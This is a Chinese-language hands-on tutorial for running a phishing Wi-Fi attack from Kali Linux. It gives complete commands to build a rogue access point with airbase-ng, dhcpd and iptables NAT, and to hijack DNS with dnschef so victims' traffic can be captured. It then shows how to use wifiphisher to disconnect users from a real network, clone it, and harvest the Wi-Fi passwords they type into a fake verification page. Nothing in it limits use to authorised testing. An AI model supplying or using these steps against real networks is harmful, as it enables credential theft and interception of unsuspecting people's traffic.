電子證據 利用Kali進行wifi釣魚實戰詳細教程
一、 Kali系統安裝和必要軟件安裝:
- 1.Kali最新版可以來我這兒拿外置驅動和光盤裝,目測用U盤裝最新版有些問題,比較麻煩。
-
2.Kali更新源配置(沒網絡可以連接Wifi):shell 運行 gedit /etc/apt/sources.list #指打開 /etc/apt目錄下的sources.list文件
然后復制:#中科大kali源
deb http://mirrors.ustc.edu.cn/kali sana main non-free contrib
deb http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.ustc.edu.cn/kali-security/ sana/updates main contrib non-free
#阿里雲kali源
deb http://mirrors.aliyun.com/kali sana main non-free contrib
deb http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
deb-src http://mirrors.aliyun.com/kali-security/ sana/updates main contrib non-free
然后保存即可。關閉后,再輸入:apt-get update && apt-get dist-upgrade,回車。等待更新。 - 3.更新源后,輸入:apt-get install isc-dhcp-server,回車。如出現依賴關系,把依賴關系的軟件卸載即可(命令:apt-get remove xxx)xxx代表軟件名。
二、利用kali建立釣魚wifi:
建立熱點
工具:isc-dhcp-server ;Aircrack-ng套件;iptables
isc-dhcp-server上面已裝,其他的kali自帶。
shell輸入:gedit /etc/dhcp/dhcpd.conf #意思同上,gedit是打開文件命令,如沒有這個文件,則創建。
寫入如下內容:
authoritative;
default-lease-time 700;
max-lease-time 8000;
subnet 10.0.0.0 netmask 255.255.255.0 {
option routers 10.0.0.1;
option subnet-mask 255.255.255.0;
option domain-name-servers 10.0.0.1;
range 10.0.0.10 10.0.0.100;
}
這里以10.0.0.1作為網關和dns服務器地址。
然后我們處理無線網卡
ifconfig wlan1 down #wlan1是你的網卡 這里意思是關閉wlan1網卡
iwconfig wlan1 mode monitor #設置wlan1網卡為監聽模式
ifconfig wlan1 up #打開wlan1網卡
airmon-ng start wlan1 #啟動wlan1網卡的監聽模式
上述命令可以防止出現:Error: Got channel -1, expected a value > 0.
然后用airbase建立熱點
airbase-ng -e Fishing -c 11 wlan1 #創建名為Fishing的熱點,Fishing 自己改。
熱點的網絡流量會被虛擬到at0這塊網卡上面
ifconfig at0 up #啟用at0這塊網卡
ifconfig at0 10.0.0.1 netmask 255.255.255.0 #在at0上配置10.0.0.1的ip地址及24位掩碼
route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1 #添加路由
echo 1 > /proc/sys/net/ipv4/ip_forward #打開ip轉發
dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhcpd.pid at0
service isc-dhcp-server start #開啟 dhcp
然后可以試着用手機連接,應該可以連上但上不了網
於是配置NAT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE #對eth0進行源nat
iptables -A FORWARD -i wlan1 -o eth0 -j ACCEPT #把無線網卡流量轉發到有線網卡(或者什么能上網的網卡)上面
iptables -A FORWARD -p tcp –(兩個-)syn -s 10.0.0.0/24 -j TCPMSS –(兩個-)set-mss 1356 #修改最大報文段長度
注意那第三個命令調整MSS,不加后果很嚴重(我就一直死在這里)
(這里可能還是DNS錯誤,請看后文中的dns代理服務器搭建)
劫持DNS
工具:dnschef
過程:
dnschef -i 10.0.0.1 –nameserver 61.128.128.68 #以ip 10.0.0.1建立dns,對於所有請求轉發到61.128.128.68進行解析。
然后就可以用wireshark等工具抓包啦!
三、wifiphisher:
(要買一個無線網卡,淘寶23元一個,團購免郵費)
這是一個wifi攻擊腳本,詳細介紹地址:https://github.com/sophron/wifiphisher
先,我們來下載wifiphisher:
在shell框里輸入命令:
git clone https://github.com/sophron/wifiphisher.git
等待下載完畢,然后你可以在你下載的目錄下看見wifiphisher這個文件夾。然后在這個文件夾運行 shell.
輸入命令:python bin/wifiphisher
如果是第一次運行腳本的話,它可能會出現提示安裝hostpad的信息,鍵入Y繼續安裝即可。
完成的時候,再次運行Wifiphisher腳本。
這次將運行8080和433端口的Web服務器,然后開始搜索附近的Wi-Fi網絡。
等待搜索完成,我們會發現一系列Wi-Fi網絡名。
然后按Ctrl+C 選擇攻擊的wifi
出現1、2、3三種模式,這三種模式代表發送不同的驗證頁面給連接的用戶,具體的頁面文件在wifiphisher目錄下的 attack page中。也可以自己寫一個。
敲下回車,Wifiphisher會顯示正在使用的界面,還有正被攻擊及復制的AP所在的SSID。
然后已連接件被攻擊wifi的用戶會被強制斷開,wifiphisher會copy這個被攻擊的wifi,做一個偽裝wifi(原理就如第二步),然后斷開的用戶將會再搜索到的是這個偽裝wifi,當他們連接這個wifi時會接受到一個驗證頁面(3種模式有3種不同的頁面),然后會要求用戶輸入密碼,當用戶輸入密碼提交后,你將會看見這個密碼。
如果他們連上這個偽裝wifi,你就可以用wireshark等工具進行抓包啦~~!